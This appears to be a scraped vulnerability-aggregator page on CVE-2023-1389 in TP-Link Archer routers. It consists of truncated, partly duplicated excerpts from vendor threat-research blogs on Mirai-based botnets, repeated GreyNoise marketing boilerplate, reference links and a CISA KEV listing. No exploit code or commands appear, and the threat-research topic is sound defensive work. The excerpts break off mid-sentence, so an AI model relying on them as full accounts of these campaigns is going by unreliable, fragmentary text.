Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
CVE/Pro
Fortinet
Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389 | FortiGuard Labs
blogs_fortinet·2023-06-20·CVSS 8.8
CVE-2023-1389 [HIGH] Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389 | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Condi DDoS Botnet Spreads via TP-Link's CVE-2023-1389
By Joie Salvio and Roy Tay | June 20, 2023
Affected platforms: Linux
Impacted parties: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity level: Critical
FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389, which was disclosed in mid-March of this year. We have additionally observed an increasing number of Condi samples collected from our monitoring systems since the end of May 2023, indicating an active attempt to expand the botnet.
This blog details the capabilities of this botnet.
Condi Botnet: Buy or Rent
While pi
Fortinet
MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day | FortiGuard Labs
blogs_fortinet·2023-06-08·CVSS 9.8
CVE-2023-34362 [CRITICAL] MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MOVEit Transfer Critical Vulnerability (CVE-2023-34362) Exploited as a 0-day
By James Slaughter, Fred Gutierrez, and Shunichi Imano | June 08, 2023
Affected Platforms: All unpatched MOVEit Transfer versions running a SQL database
Impacted Users: Any organization that uses a vulnerable version of MOVEit Transfer
Impact: Remote attackers can install a backdoor and exfiltrate data
Severity Level: High
FortiGuard Labs is aware of a critical zero-day SQL injection vulnerability in the MOVEit Secure Managed File Transfer software (CVE-2023-34362) allegedly exploited by the Cl0p ransomware threat actor. High-profile government, finance, media, aviation, and healthcare organizations have reportedly been affected, with data exfiltrated and stolen.
Due to its seve
Fortinet
RapperBot DDoS Botnet Expands into Cryptojacking | FortiGuard Labs
blogs_fortinet·2023-05-09
RapperBot DDoS Botnet Expands into Cryptojacking | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
RapperBot DDoS Botnet Expands into Cryptojacking
By Joie Salvio and Roy Tay | May 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
FortiGuard Labs has encountered new samples of the RapperBot campaign active since January 2023. RapperBot is a malware family primarily targeting IoT devices. It has been observed in the wild since June 2022. FortiGuard Labs reported on its previous campaigns in August 2022 and December 2022. Those campaigns focused on brute-forcing devices with weak or default SSH or Telnet credentials to expand the botnet’s footprint for launching Distributed Denial of Service (DDoS) attacks.
In this campaign, these threat actors hav
Trendmicro
TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
blogs_trendmicro·2023-04-24·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
# TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
Learn about exploit attempts coming from the telemetry system in Eastern Europe
By: Peter Girnus
2023/04/24
Read time: ( words)
Save to Folio
Last week, the Zero Day Initiative (ZDI) threat-hunting team observed new exploit attempts coming from our telemetry system in Eastern Europe indicating that the Mirai botnet has updated its arsenal to include CVE-2023-1389, also known as ZDI-CAN-19557/ZDI-23-451. This bug in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
Both teams’ entries were successful at the contest, and th
Trendmicro
TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
blogs_trendmicro·2023-04-24·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
## TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
Learn about exploit attempts coming from the telemetry system in Eastern Europe
By: Peter Girnus 2023/04/24 Read time: ( words)
Save to Folio
Last week, the Zero Day Initiative (ZDI) threat-hunting team observed new exploit attempts coming from our telemetry system in Eastern Europe indicating that the Mirai botnet has updated its arsenal to include CVE-2023-1389, also known as ZDI-CAN-19557/ZDI-23-451 . This bug in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
Both teams’ entries were successful at the contest, and t
Trendmicro
TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
blogs_trendmicro·2023-04-24·CVSS 8.8
CVE-2023-1389 [HIGH] TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
## TP-Link WAN-side Vulnerability CVE-2023-1389 Added to the Mirai Botnet Arsenal
Learn about exploit attempts coming from the telemetry system in Eastern Europe
By: Peter Girnus Apr 24, 2023 Read time: ( words)
Save to Folio
Last week, the Zero Day Initiative (ZDI) threat-hunting team observed new exploit attempts coming from our telemetry system in Eastern Europe indicating that the Mirai botnet has updated its arsenal to include CVE-2023-1389, also known as ZDI-CAN-19557/ZDI-23-451 . This bug in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
Both teams’ entries were successful at the contest, and
Fortinet
New RapperBot Campaign – We Know What You Bruting for this Time | FortiGuard Labs
blogs_fortinet·2022-11-16
New RapperBot Campaign – We Know What You Bruting for this Time | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New RapperBot Campaign – We Know What You Bruting for this Time
By Joie Salvio and Roy Tay | November 16, 2022
After FortiGuard Labs reported on RapperBot in our previous article titled So RapperBot, What Ya Bruting For? in August 2022, there was a significant drop in the number of samples collected in the wild. But in early October 2022, new samples with the same distinctive C2 protocol used by RapperBot were detected.
Unlike the murky objectives of the previous campaign, it is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers, which we believe to be a re-emergence of a similar campaign from earlier this year.
Affected Platforms: Linux
Impacted Users: Any organ
Fortinet
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
blogs_fortinet·2022-04-12
Enemybot: A Look into Keksec's Latest DDoS Botnet | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Enemybot: A Look into Keksec's Latest DDoS Botnet
By Joie Salvio and Roy Tay | April 12, 2022
In mid-March, FortiGuard Labs observed a new DDoS botnet calling itself “Enemybot” and attributing itself to Keksec, a threat group that specializes in cryptomining and DDoS attacks.
This botnet is mainly derived from Gafgyt’s source code but has been observed to borrow several modules from Mirai’s original source code.
It uses several methods of obfuscation for its strings to hinder analysis and hide itself from other botnets. Furthermore, it connects to a command-and-control (C2) server that is hidden in the Tor network, making its takedown more complicated.
Enemybot has been seen targeting routers from Seowon Intech, D-Link, and exploits a recently reported
Fortinet
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
blogs_fortinet·2021-12-08
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
MANGA aka Dark Mirai-based Campaign Targets New TP-Link Router RCE Vulnerability
By Joie Salvio | December 08, 2021
Last week, our FortiGuard Labs team encountered a malware sample that’s currently being distributed in the wild targeting TP-link wireless routers. It leverages a recently post-authenticated RCE vulnerability released barely two weeks prior.
As it turns out, it is an updated variant of the MANGA campaign (also known as Dark) that distributes samples based on Mirai’s published source code. This Mirai-based Distributed Denial of Service (DDOS) botnet campaign is one that FortiGuard Labs has been actively monitoring. The campaign originally piqued our interest due to the continuous updating of its list of target vulnerabilities—more so than ot
Fortinet
Mirai-based Botnet - Moobot Targets Hikvision Vulnerability | FortiGuard Labs
blogs_fortinet·2021-12-06·CVSS 9.8
CVE-2021-36260 [CRITICAL] Mirai-based Botnet - Moobot Targets Hikvision Vulnerability | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Mirai-based Botnet - Moobot Targets Hikvision Vulnerability
By Cara Lin | December 06, 2021
Last September 18th, a threat researcher released a write-up about a remote code execution vulnerability that affects various products from Hikvision, one of the largest video surveillance brands in the world. Hikvision is a CVE CNA and quickly assigned the CVE number, CVE-2021-36260 and released a patch for the vulnerability on the same day as the threat researcher’s disclosure. Shortly after, FortiGuard Labs developed an IPS signature to address it.
During our analysis, we observed numerous payloads attempting to leverage this vulnerability to probing the status of devices or extracting sensitive data from victims. One payload in particular caught our attention.
Fortinet
DDoS-for-Hire Service Powered by Bushido Botnet
blogs_fortinet·2018-10-26
DDoS-for-Hire Service Powered by Bushido Botnet
FORTIGUARD LABS THREAT RESEARCH
DDoS-for-Hire Service Powered by Bushido Botnet
By Rommel Joven and Evgeny Ananin | October 26, 2018
Distributed Denial-of-Service (DDoS) service offerings, often disguised as legitimate “booter” or “stresser” services, continue to increase in the cyber underground market. This relatively new Crime-as-a-Service trend has created an entry point for novice DDoS attackers, offering a simple option to anonymously attack nearly any website and forcing it offline for a small fee.
Sadly, due to the public release of the source code of some popular bots, building a botnet to provide these services is simpler than ever. A quick Google search returns lists of resources for botnet builders, usually with complete step-by-step instructions. Being able to re-use and ev
Fortinet
Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
blogs_fortinet·2017-11-17·CVSS 8.8
[HIGH] Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
FORTIGUARD LABS THREAT RESEARCH
Cybercriminals Exploiting Microsoft’s Vulnerable Dynamic Data Exchange Protocol
By FortiGuard SE Team | November 17, 2017
Visa Payment Systems Intelligence recently announced that cybercriminals are threatening the payments ecosystem by leveraging a vulnerable Microsoft Dynamic Data Exchange protocol in phishing campaigns. This phishing attack relies on the Dynamic Data Exchange (DDE) protocol for infection instead of the usual malicious macros or an exploit kit.
This exploit is related to the Microsoft Security Advisory 4053440 issued on November 8, 2017. It provides guidance on securing Microsoft applications when processing Dynamic Data Exchange (DDE) fields. The DDE protocol enables messages to be sent between Microsoft applications and uses shared da
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens
blogs_greynoiseio·CVSS 8.8
[HIGH] Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
At The Edge Clear: March 16-23, 2026
blogs_greynoiseio
At The Edge Clear: March 16-23, 2026
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
GreyNoise Round Up: Product Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
Storm Watch
blogs_greynoiseio
Storm Watch
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter April 2025
blogs_greynoiseio
NoiseLetter April 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise and TrinityCyber have observed active exploitation attempts using weaknesses found in CVE-2023-1389 against TP-Link Archer gigabit routers. The blog post provides information about a new Gre
blogs_greynoiseio·CVSS 8.8
[HIGH] GreyNoise and TrinityCyber have observed active exploitation attempts using weaknesses found in CVE-2023-1389 against TP-Link Archer gigabit routers. The blog post provides information about a new Gre
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
The Eleventh Day Of Tagsmas (2023): A Critical Vulnerability in TP-Link Routers (CVE-2023-1389)
blogs_greynoiseio·CVSS 8.8
[HIGH] The Eleventh Day Of Tagsmas (2023): A Critical Vulnerability in TP-Link Routers (CVE-2023-1389)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
blogs_greynoiseio·CVSS 9.0
[CRITICAL] KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/174131/TP-Link-Archer-AX21-Command-Injection.htmlhttps://www.tenable.com/security/research/tra-2023-11http://packetstormsecurity.com/files/174131/TP-Link-Archer-AX21-Command-Injection.htmlhttps://www.tenable.com/security/research/tra-2023-11https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1389
2023-03-15
Published
2023-05-01
Added to CISA KEV
Exploited in the wild